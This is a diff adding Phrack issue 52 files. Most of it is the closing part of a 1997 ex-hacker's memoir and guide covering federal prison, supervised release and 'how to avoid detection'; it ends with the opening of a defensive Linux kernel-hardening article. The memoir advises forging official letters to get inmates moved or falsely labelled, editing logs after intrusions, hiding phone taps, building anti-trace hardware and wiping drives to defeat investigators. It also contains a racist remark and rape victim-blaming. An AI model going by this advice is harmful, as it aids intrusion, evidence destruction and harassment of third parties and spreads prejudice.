+we promptly took our system off-line.  It took us two weeks to bring it up 
+again for a loss in wasted manpower of $2 million."  In some cases you might 
+be better off just using the company's payroll system to cut you a couple of 
+$10,000 checks.  That way the government has a firm loss figure.  This would 
+result in a much shorter sentence.  I'm not advocating blatant criminal actions.
+I just think the sentencing guidelines definitely need some work.
+
+
+PART II - FEDERAL PRISON
+
+
+A.  STATE v. FEDERAL 
+
+	In most cases I would say that doing time in a Federal Prison is better
+than doing time in the state institutions.  Some state prisons are such 
+violent and pathetic places that it's worth doing a little more time in the 
+Federal system.  This is going to be changing however.  The public seems to 
+think that prisons are too comfortable and as a result Congress has passed a 
+few bills to toughen things up.
+
+	Federal prisons are generally going to be somewhat less crowded, 
+cleaner, and more laid back.  The prison I was at looked a lot like a college 
+campus with plenty of grass and trees, rolling hills, and stucco buildings.  I 
+spent most of my time in the library hanging out with Minor Threat.  We would 
+argue over who was more elite. "My sentence was longer," he would argue.  "I 
+was in more books and newspapers," I would rebut. (humor)
+
+	Exceptions to the Fed is better rule would be states that permit 
+televisions and word processors in your cell.  As I sit here just prior to 
+release scribbling this article with pen and paper I yearn for even a Smith 
+Corona with one line display.  The states have varying privileges.  You could 
+wind up someplace where everything gets stolen from you.  There are also 
+states that are abolishing parole, thus taking away the ability to get out 
+early with good behavior.  That is what the Feds did.
+
+B.  SECURITY LEVELS
+
+	The Bureau of Prisons (BOP) has six security levels.  Prisons are 
+assigned a security level and only prisoners with the appropriate ratings are 
+housed there.  Often the BOP will have two or three facilities at one location.
+Still, they are essentially separate prisons, divided by fences.
+
+	The lowest level facility is called a minimum, a camp, or FPC. 
+Generally speaking, you will find first time, non-violent offenders with less 
+than 10 year sentences there.  Camps have no fences.  Your work assignment at 
+a camp is usually off the prison grounds at a nearby military base.  Other 
+times camps operate as support for other nearby prisons.
+
+	The next level up is a low Federal Correctional Institution (FCI). 
+These are where you find a lot of people who should be in a camp but for some 
+technical reason didn't qualify.  There is a double fence with razor wire 
+surrounding it.  Again you will find mostly non-violent types here.  You would 
+really have to piss someone off before they would take a swing at you.
+
+	Moving up again we get to medium and high FCI's which are often 
+combined.  More razor wire, more guards, restricted movement and a rougher 
+crowd.  It's also common to find people with 20 or 30+ year sentences. 
+Fighting is much more common.  Keep to yourself, however, and people generally 
+leave you alone.  Killings are not too terribly common.  With a prison 
+population of 1500-2000, about one or two a year leave on a stretcher and don't
+come back.
+
+	The United States Penitentiary (U.S.P.) is where you find the murderers,
+rapists, spies and the roughest gang bangers.  "Leavenworth" and "Atlanta" are 
+the most infamous of these joints.  Traditionally surrounded by a 40 foot 
+brick wall, they take on an ominous appearance.  The murder rate per prison 
+averages about 30 per year with well over 250 stabbings.
+
+	The highest security level in the system is Max, sometimes referred to 
+as "Supermax."  Max custody inmates are locked down all the time.  Your mail is
+shown to you over a TV screen in your cell.  The shower is on wheels and it 
+comes to your door.  You rarely see other humans and if you do leave your cell 
+you will be handcuffed and have at least a three guard escort.  Mr. Gotti, the 
+Mafia boss, remains in Supermax.  So does Aldridge Ames, the spy.
+
+
+C.  GETTING DESIGNATED 
+
+	Once you are sentenced, the BOP has to figure out what they want to do 
+with you.  There is a manual called the "Custody and Classification Manual" 
+that they are supposed to follow.  It is publicly available through the 
+Freedom of Information Act and it is also in most prison law libraries.  
+Unfortunately, it can be interpreted a number of different ways.  As a result, 
+most prison officials responsible for classifying you do pretty much as they 
+please.
+
+	Your first classification is done by the Region Designator at BOP 
+Regional Headquarters.  As a computer hacker you will most likely be placed in 
+a camp or a low FCI.  This is assuming you weren't pulling bank jobs on the 
+side.  -IF- you do wind up in an FCI, you should make it to a camp after six 
+months.  This is assuming you behave yourself.
+
+	Another thing the Region Designator will do is to place a "Computer 
+No" on your file.  This means you will not be allowed to operate a computer at 
+your prison work assignment.  In my case I wasn't allowed to be within 10 feet 
+of one.  It was explained to me that they didn't even want me to know the 
+types of software they were running.  Incidentally, the BOP uses PC/Server 
+based LANs with NetWare 4.1 running on Fiber 10baseT Ethernet connections to 
+Cabletron switches and hubs.  PC based gateways reside at every prison. The 
+connection to the IBM mainframe (Sentry) is done through leased lines via 
+Sprintnet's Frame Relay service with 3270 emulation software/hardware resident 
+on the local servers.  Sentry resides in Washington, D.C. with SNA type 
+network concentrators at the regional offices. ;-) And I picked all of this up 
+without even trying to.  Needless to say, BOP computer security is very lax. 
+Many of their publicly available "Program Statements" contain specific 
+information on how to use Sentry and what it's designed to do.  They have other
+networks as well, but this is not a tutorial on how to hack the BOP.  I'll save
+that for if they ever really piss me off. (humor)
+
+	Not surprisingly, the BOP is very paranoid about computer hackers. I 
+went out of my way not to be interested in their systems or to receive 
+computer security related mail.  Nevertheless, they tried restricting my mail 
+on numerous occasions.  After I filed numerous grievances and had a meeting 
+with the warden, they decided I was probably going to behave myself. My 20 or 
+so magazine subscriptions were permitted to come in, after a special screening.
+Despite all of that I still had occasional problems, usually when I received 
+something esoteric in nature.  It's my understanding, however, that many 
+hackers at other prisons have not been as fortunate as I was. 
+
+D.  IGNORANT INMATES
+
+	 You will meet some of the stupidest people on the planet in prison. I 
+suppose that is why they are there, too dumb to do anything except crime.  And 
+for some strange reason these uneducated low class common thieves think they 
+deserve your respect.  In fact they will often demand it.  These are the same 
+people that condemn everyone who cooperated, while at the same time feel it is 
+fine to break into your house or rob a store at gunpoint.  These are the types 
+of inmates you will be incarcerated with, and occasionally these inmates will 
+try to get over on you.  They will do this for no reason other than the fact 
+you are an easy mark.
+
+	There are a few tricks hackers can do to protect themselves in prison. 
+The key to your success is acting before the problem escalates.  It is also 
+important to have someone outside (preferably another hacker) that can do some 
+social engineering for you.  The objective is simply to have your problem 
+inmate moved to another institution.  I don't want to give away my methods but 
+if staff believes that an inmate is going to cause trouble, or if they believe 
+his life is in danger, they will move him or lock him away in segregation. 
+Social engineered letters (official looking) or phone calls from the right 
+source to the right department will often evoke brisk action.  It's also quite 
+simple to make an inmates life quite miserable.  If the BOP has reason to 
+believe that an inmate is an escape risk, a suicide threat, or had pending 
+charges, they will handle them much differently.  Tacking these labels on an 
+inmate would be a real nasty trick.  I have a saying: "Hackers usually have 
+the last word in arguments." Indeed.
+
+	Chances are you won't have many troubles in prison.  This especially 
+applies if you go to a camp, mind your own business, and watch your mouth.  
+Nevertheless, I've covered all of this in the event you find yourself caught 
+up in the ignorant behavior of inmates whose lives revolve around prison.  And 
+one last piece of advice, don't make threats, truly stupid people are too 
+stupid to fear anything, particularly an intelligent man.  Just do it.
+
+E.  POPULATION
+
+	The distribution of blacks, whites and Hispanics varies from 
+institution to institution.  Overall it works out to roughly 30% white, 30% 
+Hispanic and 30% black.  The remaining 10% are various other races.  Some 
+joints have a high percent of blacks and vice versa.  I'm not necessarily a 
+prejudiced person, but prisons where blacks are in majority are a nightmare. 
+Acting loud, disrespectful, and trying to run the place is par for the course.
+
+	In terms of crimes, 60% of the Federal inmate population are 
+incarcerated for drug related crimes.  The next most common would be bank 
+robbery (usually for quick drug money), then various white collar crimes.  The 
+Federal prison population has changed over the years.  It used to be a place 
+for the criminal elite.  The tough drug laws have changed all of that.
+
+	Just to quell the rumors, I'm going to cover the topic of prison rape. 
+Quite simply, in medium and low security level Federal prisons it is unheard 
+of.  In the highs it rarely happens.  When it does happen, one could argue 
+that the victim was asking for it.  I heard an inmate say once, "You can't 
+make no inmate suck cock that don't wanta."  Indeed.  In my 41 months of 
+incarceration, I never felt in any danger.  I would occasionally have inmates 
+that would subtly ask me questions to see where my preferences lie, but once I 
+made it clear that I didn't swing that way I would be left alone.  Hell, I got 
+hit on more often when I was hanging out in Hollywood!
+
+	On the other hand, state prisons can be a hostile environment for rape 
+and fighting in general.  Many of us heard how Bernie S. got beat up over use 
+of the phone.  Indeed, I had to get busy a couple of times.  Most prison 
+arguments occur over three simple things: the phone, the TV and money/drugs. 
+If you want to stay out of trouble in a state prison, or Federal for that 
+matter, don't use the phone too long, don't change the channel and don't get 
+involved in gambling or drugs.  As far as rape goes, pick your friends 
+carefully and stick with them.  And always, always, be respectful.  Even if 
+the guy is a fucking idiot (and most inmates are), say excuse me.
+
+	My final piece of prison etiquette advice would be to never take your 
+inmate problems to "the man" (prison staff).  Despite the fact that most 
+everyone in prison snitched on their co-defendants at trial, there is no 
+excuse for being a prison rat.  The rules are set by the prisoners themselves. 
+If someone steps out of line there will likely be another inmate who will be 
+happy to knock him back.  In some prisons inmates are so afraid of being 
+labeled a rat that they refuse to be seen talking alone with a prison staff 
+member.  I should close this paragraph by stating that this bit of etiquette 
+is routinely ignored as other inmates will snitch on you for any reason 
+whatsoever.  Prison is a strange environment.
+
+F.  DOING TIME
+
+	You can make what you want to out of prison.  Some people sit around 
+and do dope all day.  Others immerse themselves in a routine of work and 
+exercise.  I studied technology and music.  Regardless, prisons are no longer 
+a place of rehabilitation.  They serve only to punish and conditions are only 
+going to worsen.  The effect is that angry, uneducated, and unproductive 
+inmates are being released back into society.
+
+	While I was incarcerated in 95/96, the prison band program was still 
+in operation.  I played drums for two different prison bands.  It really helped
+pass the time and when I get out I will continue with my career in music. Now 
+the program has been canceled, all because some senator wanted to be seen as 
+being tough on crime.  Bills were passed in Congress.  The cable TV is gone, 
+pornography mags are no longer permitted, and the weight piles are being 
+removed.  All this means is that prisoners will have more spare time on their 
+hands, and so more guards will have to be hired to watch the prisoners.  I 
+don't want to get started on this subject.  Essentially what I'm saying is 
+make something out of your time.  Study, get in to a routine and before you 
+know you'll be going home, and a better person on top of it.
+
+G.  DISCIPLINARY ACTIONS 
+
+	What fun is it if you go to prison and don't get into some mischief? 
+Well, I'm happy to say the only "shots" (violations) I ever received were for 
+having a friend place a call with his three-way calling for me (you can't call 
+everyone collect), and drinking homemade wine. |-) The prison occasionally 
+monitors your phone calls and on the seven or eight hundredth time I made a 
+three-way I got caught.  My punishment was ten hours of extra duty (cleaning 
+up).  Other punishments for shots include loss of phone use, loss of 
+commissary, loss of visits, and getting thrown in the hole.  Shots can also 
+increase your security level and can get you transferred to a higher level 
+institution.  If you find yourself having trouble in this area you may want to 
+pick up the book, "How to win prison disciplinary hearings", by Alan Parmelee, 
+206-328-2875.
+
+H.  ADMINISTRATIVE REMEDY 
+
+	If you have a disagreement with the way staff is handling your case 
+(and you will) or another complaint, there is an administrative remedy 
+procedure.  First you must try to resolve it informally.  Then you can file a 
+form BP-9.  The BP-9 goes to the warden.  After that you can file a BP-10 
+which goes to the region.  Finally, a BP-11 goes to the National BOP 
+Headquarters (Central Office).  The whole procedure is a joke and takes about 
+six months to complete.  Delay and conquer is the BOP motto.  After you 
+complete the remedy process to no avail, you may file your action in a civil 
+court.  In some extreme cases you may take your case directly to the courts 
+without exhausting the remedy process. Again, the "Prisoners Self-Help 
+Litigation Manual" covers this quite well.
+
+	My best advice with this remedy nonsense is to keep your request brief,
+clear, concise and only ask for one specific thing per form.  Usually if you 
+"got it coming" you will get it.  If you don't, or if the BOP can find any 
+reason to deny your request, they will. 
+
+	For this reason I often took my problems outside the prison from the 
+start.  If it was a substantial enough issue I would inform the media, the 
+director of the BOP, all three of my attorneys, my judge and the ACLU.  Often 
+this worked. It always pissed them off.  But, alas I'm a man of principle and 
+if you deprive me of my rights I'm going to raise hell.  In the past I might 
+have resorted to hacker tactics, like disrupting the BOP's entire 
+communication system bringing it crashing down!  But...I'm rehabilitated now. 
+Incidentally, most BOP officials and inmates have no concept of the kind of 
+havoc a hacker can wield on an individuals life.  So until some hacker shows 
+the BOP which end is up you will have to accept the fact most everyone you 
+meet in prison will have only nominal respect for you.  Deal with it, you're 
+not in cyberspace anymore.
+
+I.  PRISON OFFICIALS 
+
+	There are two types, dumb and dumber.  I've had respect for several
+but I've never met one that impressed me as being particularly talented in a 
+way other than following orders.  Typically you will find staff that are 
+either just doing their job, or staff that is determined to advance their 
+career.  The latter take their jobs and themselves way too seriously.  They 
+don't get anywhere by being nice to inmates so they are often quite curt.
+Ex-military and law enforcement wannabes are commonplace.  All in all they're 
+a pain in the ass but easy to deal with.  Anyone who has ever been down 
+(incarcerated) for awhile knows it's best to keep a low profile.  If they don't
+know you by name you're in good shape.
+
+	One of the problems that computer hackers will encounter with prison 
+staff is fear and/or resentment.  If you are a pretentious articulate educated 
+white boy like myself you would be wise to act a little stupid.  These people 
+don't want to respect you and some of them will hate everything that you stand 
+for.  Many dislike all inmates to begin with.  And the concept of you someday 
+having a great job and being successful bothers them.  It's all a rather 
+bizarre environment where everyone seems to hate their jobs. I guess I've led 
+a sheltered life.
+
+	Before I move on, sometimes there will be certain staff members, like 
+your Case Manager, that will have a substantial amount of control over your 
+situation.  The best way to deal with the person is to stay out of their way. 
+Be polite, don't file grievances against them and hope that they will take 
+care of you when it comes time.  If this doesn't seem to work, then you need 
+to be a total pain in the ass and ride them with every possible request you 
+can muster.  It's especially helpful if you have outside people willing to 
+make calls.  Strong media attention will usually, at the very least, make the 
+prison do what they are supposed to do.  If you have received a lot of bad 
+press, this could be a disadvantage.  If your care continues to be a problem, 
+the prison will transfer you to another facility where you are more likely to 
+get a break.  All in all how you choose to deal with staff is often a 
+difficult decision.  My advice is that unless you are really getting screwed 
+over or really hate the prison you are in, don't rock the boat.
+
+J.  THE HOLE
+
+	Segregation sucks, but chances are you will find yourself there at 
+some point and usually for the most ridiculous of reasons.  Sometimes you will 
+wind up there because of what someone else did.  The hole is a 6' x 10' 
+concrete room with a steel bed and steel toilet.  Your privileges will vary, 
+but at first you get nothing but a shower every couple of days.  Naturally they
+feed you but, it's never enough, and it's often cold.  With no snacks you 
+often find yourself quite hungry in-between meals.  There is nothing to do 
+there except read and hopefully some guard has been kind enough to throw you 
+some old novel.
+
+	Disciplinary actions will land you in the hole for typically a week or 
+two.  In some cases you might get stuck there for a month or three.  It depends 
+on the shot and on the Lieutenant that sent you there.  Sometimes people never 
+leave the hole....
+
+K.  GOOD TIME
+
+	You get 54 days per year off of your sentence for good behavior.  If 
+anyone tells you that a bill is going to be passed to give 108 days, they are 
+lying.  54 days a year works out to 15% and you have to do something 
+significant to justify getting that taken away.  The BOP has come up with the 
+most complicated and ridiculous way to calculate how much good time you have 
+earned.  They have a book about three inches thick that discusses how to 
+calculate your exact release date.  I studied the book intensely and came to 
+the conclusion that the only purpose it serves is to covertly steal a few days 
+of good time from you.  Go figure.
+
+L.  HALFWAY HOUSE
+
+	All "eligible" inmates are to serve the last 10% of their sentence 
+(not to exceed six months) in a Community Corrections Center (CCC).  At the CCC
+, which is nothing more than a large house in a bad part of town, you are to 
+find a job in the community and spend your evenings and nights at the CCC.  You
+have to give 25% of the gross amount of your check to the CCC to pay for all of
+your expenses, unless you are a rare Federal prisoner sentenced to serve all of
+your time at the CCC in which case it is 10%.  They will breathalyse and 
+urinanalyse you routinely to make sure you are not having too much fun.  If 
+you're a good little hacker you'll get a weekend pass so you can stay out all 
+night.  Most CCCs will transfer you to home confinement status after a few 
+weeks.  This means you can move into your own place, (if they approve it) but 
+still have to be in for the evenings.  They check up on you by phone.  And no, 
+you are not allowed call forwarding, silly rabbit.
+
+M.  SUPERVISED RELEASE
+
+	Just when you think the fun is all over, after you are released from 
+prison or the CCC, you will be required to report to a Probation Officer.  For
+the next 3 to 5 years you will be on Supervised Release.  The government 
+abolished parole, thereby preventing convicts from getting out of prison early.
+Despite this they still want to keep tabs on you for awhile.
+
+	Supervised Release, in my opinion, is nothing more than extended 
+punishment.  You are a not a free man able to travel and work as you please. 
+All of your activities will have to be presented to your Probation Officer 
+(P.O.).  And probation is essentially what Supervised Release is.  Your P.O. 
+can violate you for any technical violations and send you back to prison for 
+several months, or over a year.  If you have ANY history of drug use you will 
+be required to submit to random (weekly) urinalyses.  If you come up dirty it's
+back to the joint.
+
+	As a hacker you may find that your access to work with, or possession 
+of computer equipment may be restricted.  While this may sound pragmatic to 
+the public, in practice it serves no other purpose that to punish and limit a 
+former hacker's ability to support himself.  With computers at libraries, copy 
+shops, schools, and virtually everywhere, it's much like restricting someone 
+who used a car to get to and from a bank robbery to not ever drive again.  If a
+hacker is predisposed to hacking he's going to be able to do it with or 
+without restrictions.  In reality many hackers don't even need a computer to 
+achieve their goals.  As you probably know a phone and a little social 
+engineering go a long way.
+
+	But with any luck you will be assigned a reasonable P.O. and you will 
+stay out of trouble.  If you give your P.O. no cause to keep an eye on you, 
+you may find the reins loosening up.  You may also be able to have your
+Supervised Release terminated early by the court.  After a year or so, with 
+good cause, and all of your government debts paid, it might be plausible.  Hire
+an attorney, file a motion.
+
+	For many convicts Supervised Release is simply too much like being in 
+prison.  For those it is best to violate, go back to prison for a few months, 
+and hope the judge terminates their Supervised Release.  Although the judge 
+may continue your supervision, he/she typically will not.
+
+
+PART III
+
+
+A.  HOW TO AVOID DETECTION
+
+        Now that you know what kind of trouble you are facing I'll go back to
+the beginning.  If what I've just covered doesn't make you want to stop
+hacking then you had better learn how to protect yourself.  Many hackers feel
+they have some god given constitutional right to hack.  Many don't believe it
+should be illegal.  Well, neurosis and personality disorders work in strange
+ways.  Regardless, I'll cover the topic of stealth.  Please note that I in no
+way advocate or encourage hacking.  This technical information is being
+provided for educational purposes only.  And as I mentioned you may feel you
+have a perfectly legitimate reason for avoiding detection, simply trying to
+stay clear of other hackers would be an acceptable reason.  This paper (I'm
+sure) will also serve to educate law enforcement officials on the methods
+currently being deployed by hackers to avoid detection.
+
+        Avoiding being identified while hacking is in actually a rather simple
+feat, assuming you follow a few simple rules.  Unfortunately, very few
+people bother with them, due typically to arrogance and ego.  Which as I have
+noticed, seems to be a trait that is a prerequisite to being a successful
+hacker.  I've never met a hacker who didn't think he was the shit.  And when
+it gets right down to it that was the reason that Mitnick got caught.  I'll
+examine this incident a little later.
+
+     So I will list here a few of the basic rules I used, and then I'll
+expound upon them a little later.
+
+     * Most important of all, I would never tell another hacker who I was,
+       where I lived, or give out my home phone number. (OK, I screwed up
+       on that one.)
+
+     * I didn't set up network access accounts up in my real name or use
+       my real address.
+
+     * I didn't set up phone numbers in my real name.
+
+     * I would never dial directly in to anything I was hacking.
+
+     * I would set up some kind of notification system that would let me
+       know if someone was trying to figure out where I was connecting from.
+
+     * I didn't transmit personal data on systems I had have hacked into.
+
+     * When I used a network or computer for work or social objectives, I
+       tried to keep it separate from my hacking.
+
+     * I never assumed that just by connecting through a bunch of different
+       networks or using cellular phones that I was safe.  Even though most
+       cellular networks do not have triangulation equipment installed they
+       still have the ability to narrow a transmitting location down to a
+       square mile of even a few blocks, this even well after you have dis-
+       connected.
+
+     * The minute I got into a system I would examine and edit all of the
+       logs.  I would also look for email daemons on admin or admin assoc-
+       iated accts. that sent out copies of the system security logs.
+     
+     * When setting up accts. on systems I would use different login ID's.
+
+     * I never went to hacker cons. (Until I worked with the FBI)
+
+     * I would change network access dial up accts. and dial up numbers
+       every so often. I would also change living locations every 8-12
+       months.
+
+     * I would keep in mind that the numbers I dialed on my phone could
+       eventually be used to track me again.  For example, if I called my
+       girl friend frequently, after I changed numbers and location I might
+       still be calling that number.  The telcos now have toll record data
+       base software that can cross reference and track this type of thing.
+
+     * I rarely used IRC until I worked with the FBI.  If -you- must, change
+       your handle frequently, remain in invisible mode, and if you're leet
+       enough, spoof your IP.  Remember that you should never trust other
+       hackers.  Many times association with them will cause you as much
+       trouble as a run in with the Feds.
+
+        And yes the FBI logs all of the IRC channels and searches them for key
+words when they are looking for information on someone or some breech.  There
+is a secret logging program running on a special irc.server that doesn't
+accept port 6667 connections, etc.  Doesn't show up as a link either. Hmm. ;-)
+
+         Following all of those rules would be tough.  The fact of the matter
+is if you generate enough interest and piss off the right people, they will
+come after you.  However, the FBI routinely passes over low level hackers.
+When I worked with the Bureau I was instructed that only the most malicious
+and aggressive hackers where to be investigated.  Fine with me, wasn't my goal 
+in life to put a bunch a little hacker dorks in jail.  It's not real easy to
+catch an accomplished hacker but it can be done, it's really just a matter of
+contacting all of the right people and putting a little time into it.
+Typically hackers get caught because someone snitched.  Thus the importance of
+my first rule, I never told anyone who I really was.  The other primary reason
+for getting caught is arrogance or underestimating the abilities of the
+authorities.  Poulsen didn't believe an investigator would sit outside of a
+grocery store for a week on the off chance he might show up.  Poulsen had used
+the pay phones at that store a few times, which was determined by a toll
+record search.  Mitnick didn't think someone would go through the trouble of
+doing toll searches on cell phone records then radio frequency triangulating
+his location.
+
+     Poulsen and I went through some rather elaborate anti-detection
+procedures.  Since I had physical access to my local telco Central Office I
+would activate, connect, and wire all of my own phone services.  There was
+essentially no record of my phone number or cable and pair data.  In addition, 
+I ran the wires going into my apartment through a trash chute, over the roof
+covered by tar, and down a vent pipe into my bathroom.  The connection to the
+bridging terminal (F2) was through a hole drilled into the back of the
+junction box.  Examination of the telephone box in the basement of my building
+revealed no connections, you would have had to take the box apart to see it.
+And if that wasn't enough over at the C.O. I tapped on to the output channel
+(SC1, which was the feed to SCCS) of the 1AESS telephone switch and ran it up
+to my apartment.  There I had an old PC-XT with a Bell 202 modem watching the
+1AESS output.  Poulsen wrote a small basic program that looked for call traces
+and any other suspicious activity.  The XT would start beeping and print out
+any of those output messages.  Elaborate indeed.
+
+
+B.  THE STEALTH BOX
+
+
+        But a truly good anti-detection system would notify you absolutely if
+someone was attempting to trace your connection.  In addition, it would
+terminate the connection before it allowed someone to see where it was going.
+What I am suggesting is some type of dial in/dial out mechanism.  For example,
+2 modems connected back to back, with their 232 ports connected.  They would
+then be placed in a generic wall mounted box in anonymous phone closet
+somewhere.  In addition, a stun gun would be wired to give the modems a death
+shock if the box was opened by an unauthorized person.  A password would be
+set on the modem for dial out and the phone lines feeding the two modems would
+have to be set up under separate accounts.  This would require anyone
+investigating, to come out and take a gander at this device to determine that,
+it's not the location of the hacker, and that yet another call trace is in
+order to see who is dialing in.  However, having opened the box the
+investigator has disabled the device and when you dial in you'll know that
+something is up.  Even if they attempt to replace the device, they could never
+know the original password, or even if there was one.  It would be further
+advisable to disguise the telephone lines feeding the device, making it
+necessary to open the box to identify them.
+
+        Well that's just an idea for the design of an anti-detection device.
+It's obviously a bit complex, but you get the idea.  My point being that
+avoiding detection is not a simple task.  If someone wants you they can get
+you.  There really isn't such a thing as a secure connection; virtually
+everything can be traced, short of a highly directional data burst satellite
+uplink.  At that point the Air Force National Reconnaissance Office (NRO) or
+the NSA would have to get involved, big bucks.
+
+        Aside from setting up physical hardware another idea would be to find
+a Sysadmin that will let you use his system to connect through.  If you trust
+him to tell you if there has been an inquiry regarding your connection then
+you might be OK.  It would also be wise to set up background processes that
+monitor finger and other related probes of your account.  Watch them watch you.
+
+        As I mentioned earlier if you fall under surveillance there will be
+2-way radio traffic in your vicinity.  Using the Opto-Electronics Explorer
+will detect this and you can further investigate to see who it may be.  Good
+physical surveillance is difficult to detect.  Bad physical surveillance is
+comical.
+
+
+C.  MORE PROTECTION
+
+
+        I covered encryption earlier and as I mentioned it really is not safe
+to assume that it will protect you from someone who takes possession of your
+computer.  The only truly safe encryption would be a military spec.
+hardware/software implementation.  When people talk about secure encryption
+they are not taking into account that all the power of a Government might be 
+trying to crack it, and that they will have physical access to the encryption
+device, your computer!  This leaves us with one other method, destroying the
+data.  Now this in and of it's self can be construed as obstruction of
+justice.  However, should you feel the need to instantly destroy all of the
+data on your hard drive, for oh.. lets say educational purposes.  I would
+suggest mounting a bulk magnetic tape eraser next to your hard drive.  You can
+pick one up at Radio Hack, err Shack.  One flip of the panic switch, thus
+powering up the eraser while the drive is turning, and ZAP!  Mount a switch
+next to your bed. ;-)
+
+        This may or may not destroy all of the data on your drive.  If the
+drive disk is removed and placed on a special reader some data may still be
+recovered.  This is a science in itself.  DOD spec. requires that a hard drive
+be written to with O's 7 times before it is considered erased.  Simply erasing
+a file, formatting, or defragging will not suffice.  Look for a shareware
+utility named "BCwipe".  This will erase to military spec.  You may also want
+to install some type of program that auto erases under certain conditions.
+Regardless, computer specialists that work with computer crime are trained to
+look for this.
+
+        There are still a lot of issues that could be covered with respect to
+avoiding detection and keeping clear of hackers.  In fact I could fill a book, 
+and in retrospect I probably should have.  But I told a lot of people I would
+write this file and make it public.  Hope you found it of some assistance.
+            
+
+CLOSURE
+
+	What a long strange trip it's been.  I have a great deal of mixed 
+emotions about my whole ordeal.  I can however, say that I HAVE benefited 
+from my incarceration.  However, it certainly was not on the behalf of how I 
+was handled by the government.  No, despite their efforts to kick me when I 
+was down, use me, turn their backs after I had assisted them, and in general, 
+just violate my rights, I was still able to emerge better educated than when I 
+went in.  But frankly, my release from prison was just in the nick of time.
+The long term effects of incarceration and stress were creeping up on me, and 
+I could see prison conditions were worsening.  It's hard to express the 
+poignancy of the situation but the majority of those incarcerated feel that if 
+drastic changes are not made America is due for some serious turmoil, perhaps 
+even a civil war.  Yes, the criminal justice system is that screwed up.  The 
+Nation's thirst for vengeance on criminals is leading us into a vicious 
+feedback loop of crime and punishment, and once again crime.  Quite simply, 
+the system is not working.  My purpose in writing this article was not to send 
+any kind of message.  I'm not telling you how not to get caught and I'm not 
+telling you to stop hacking.  I wrote this simply because I feel like I owe it 
+to whomever might get use of it.  For some strange reason I am oddly compelled 
+to tell you what happened to me.  Perhaps this is some kind or therapy, 
+perhaps it's just my ego, perhaps I just want to help some poor 18 year old 
+hacker who really doesn't know what he is getting himself in to.  Whatever the 
+reason, I just sat down one day and started writing.
+
+	If there is a central theme to this article it would be how ugly your 
+world can become.  Once you get grabbed by the law, sucked into their vacuum, 
+and they shine the spotlight on you, there will be little you can do to 
+protect yourself.  The vultures and predators will try to pick what they can 
+off of you.  It's open season for the U.S. Attorneys, your attorney, other 
+inmates, and prison officials.  You become fair game.  Defending yourself from 
+all of these forces will require all of your wits, all of your resources, and 
+occasionally your fists.
+
+	Furthering the humiliation, the press, as a general rule, will not be 
+concerned with presenting the truth.  They will print what suits them and 
+often omit many relevant facts.  If you have read any of the 5 books I am 
+covered in you will no doubt have a rather jaded opinion of me.  Let me assure 
+you that if you met me today you would quickly see that I am quite likable and 
+not the villain many (especially Jon Littman) have made me out to be.  You may 
+not agree with how I lived my life, but you wouldn't have any trouble 
+understanding why I chose to live it that way.  Granted I've made my mistakes, 
+growing up has been a long road for me.  Nevertheless, I have no shortage of 
+good friends.  Friends that I am immensely loyal to.  But if you believe 
+everything you read you'd have the impression that Mitnick is a vindictive 
+loser, Poulsen a furtive stalker, and I a two faced rat.  All of those 
+assessments would be incorrect.
+
+	So much for first impressions.  I just hope I was able to enlighten 
+you and in some way to help you make the right choice.  Whether it's 
+protecting yourself from what could be a traumatic life altering experience, 
+or compelling you to focus your computer skills on other avenues, it's 
+important for you to know the program, the language, and the rules.
+
+See you in the movies.
+
+Agent Steal
+1997
+
+----[ EOF
+
diff --git a/phrack52/6.txt b/phrack52/6.txt
new file mode 100644
index 0000000..bea6ba9
--- /dev/null
+++ b/phrack52/6.txt
@@ -0,0 +1,1123 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 06 of 20
+
+
+-------------------------[  Hardening the Linux Kernel (series 2.0.x)
+
+
+--------[  route|daemon9 <route@infonexus.com>
+
+
+
+
+----[  Introduction and Impetus
+
+
+    Linux.  The cutest Unix-like O/S alive today.  Everyone knows at least
+*one* person who has at least *one* Linux machine.  Linux, whatever your
+opinion of it, is out there, and is being used by more and more people.  Many
+of the people using Linux are using it in multi-user environments.  All of a
+sudden they find security to be a big issue.  This article is for those people.
+
+    This article covers a few areas of potential insecurity in the Linux O/S
+and attempts to improve upon them.  It contains several security related
+kernel patches for the 2.0.x kernels (each has been tested successfully on the
+2.0.3x kernels and most should work on older 2.0.x kernels; see each
+subsection for more info).
+
+    These are kernel patches.  They do nothing for user-land security.  If you 
+can not set permissions and configure services correctly, you should not be
+running a Unix machine.
+
+    These patches are not bugfixes.  They are preventative security fixes.
+They are intended to prevent possible problems and breaches of security from 
+occurring.  In some cases they can remove (or at least severely complicate) the 
+threat of many of today's most popular methods of attack.
+
+    These patches are not really useful on a single-user machine.  They are
+really intended for a multi-user box.
+
+    This article is for those of you who want better security out of your Linux
+O/S.  If you want to go a bit further, look into the POSIX.1e (POSIX 6) stuff. 
+POSIX.1e is a security model that basically separates identity and privilege.
+Effectively, it splits superuser privileges into different `capabilities`.
+Additionally, the Linux POSIX.1e (linux-privs) implementation offers a bitmapped 
+securelevel, kernel-based auditing (userland audit hooks are being developed), 
+and ACLs. See: http://parc.power.net/morgan/Orange-Linux/linux-privs/index.html
+
+    To sum it up, in this article, we explore a few ways to make the multi-user
+Linux machine a bit more secure and resilient to attack.
+
+
+----[  The Patches
+
+
+procfs patch
+------------
+Tested on:  2.0.0 +
+Author:     route
+
+    Why should we allow anyone to be able to view info on any process?
+
+    Normally, /bin/ps can show process listing for every process in the 
+kernel's process table, regardless of ownership.  A non-privileged user can 
+see all the running processes on a system.  This can include information that 
+could be used in some forms of known / guessed PID-based attacks, not to 
+mention the obvious lack of privacy.  /bin/ps gets this process information by 
+reading the /proc filesystem.
+
+    The /proc filesystem is a virtual filesystem interface into the O/S which 
+provides all kinds of good information including the status of various 
+portions of the running kernel and a list of currently running processes.  It 
+has a filesystem interface, which means it has file-system-like access
+controls.  As such, we can change the default access permissions on the inode
+from 555 to 500.
+
+    And that's the patch.  We just change the permissions on the inode from
+S_IFDIR | S_IRUGO | S_IXUGO to S_IFDIR | S_IRUSR | S_IXUSR.
+
+
+trusted path execution patch
+----------------------------
+Tested on:  2.0.0 +
+Author:     route (2.0.x version, original 1.x patch by merc)
+
+    Why should we allow arbitrary programs execution rights?
+
+    Consider this scenario:  You are the administrator of a multi-user Linux 
+machine.  All of a sudden there is a new bug in the Pentium(tm) processor!  
+As it happens, this bug causes the CPU to lock up entirely, requiring a cold
+reboot.  This bug is also exploitable by any user regardless of privilege.  All
+it necessitates is for the malevolent user to 1) get the source, 2) compile the 
+exploit, and 3) execute the program.
+
